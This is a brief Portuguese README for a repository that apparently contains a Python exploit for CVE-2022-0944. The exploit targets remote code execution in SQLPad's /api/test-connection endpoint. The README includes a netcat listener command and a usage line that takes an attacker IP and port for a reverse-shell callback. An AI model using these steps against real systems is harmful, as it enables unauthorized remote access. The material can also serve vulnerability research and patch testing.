
Exploit em Python para CVE-2022-0944 que permite execução remota de código cega no SQLPad por meio do endpoint /api/test-connection com callback via netcat.
Este repositório contém um script de exploração para o CVE-2022-0944 no SQLPad, uma vulnerabilidade que permite a Execução Remota de Código (RCE) através do endpoint /api/test-connection.
O script fornecido (exploit.py) demonstra como explorar a vulnerabilidade RCE no SQLPad. O script envia um payload para o endpoint vulnerável, executando um comando no servidor alvo.
requests (pode ser instalada via pip)nc -lvnp 4444
Execute o Exploit
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>